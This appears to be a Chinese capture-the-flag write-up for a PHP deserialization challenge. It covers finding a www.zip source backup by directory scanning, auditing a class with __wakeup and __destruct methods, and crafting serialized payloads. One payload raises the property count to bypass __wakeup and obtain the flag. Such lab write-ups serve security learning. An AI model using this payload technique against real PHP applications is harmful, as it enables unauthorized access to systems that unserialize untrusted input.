信息搜集

想查看页面源代码，但是右键没有这个选项。
我们可以ctrl+u或者在url前面加view-source:查看：
没什么有用信息。根据页面的hint，我们考虑扫一下目录看看能不能扫出一些文件.
扫到了备份文件www.zip，解压一下查看网站源代码。

代码审计：

index.php文件下：

class.php文件：

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

考察的是PHP反序列化漏洞.

反序列化

我们最终的目的是要获得flag，根据class.php文件，我们需要对象的成员变量 username='admin',password=100

所以序列化后的形式：

O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

因为成员变量是用private修饰的私有变量，所有要在变量中类名的前后添加%00，也就是/0

但是反序列化时会自动调用__wakeup方法，修改我们的username的值。
绕过__wakeup()：在反序列化时，当前属性个数大于实际属性个数时，就会跳过__wakeup()

所有序列化修改为：

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

"Name":2 修改成 "Name":3

得到flag.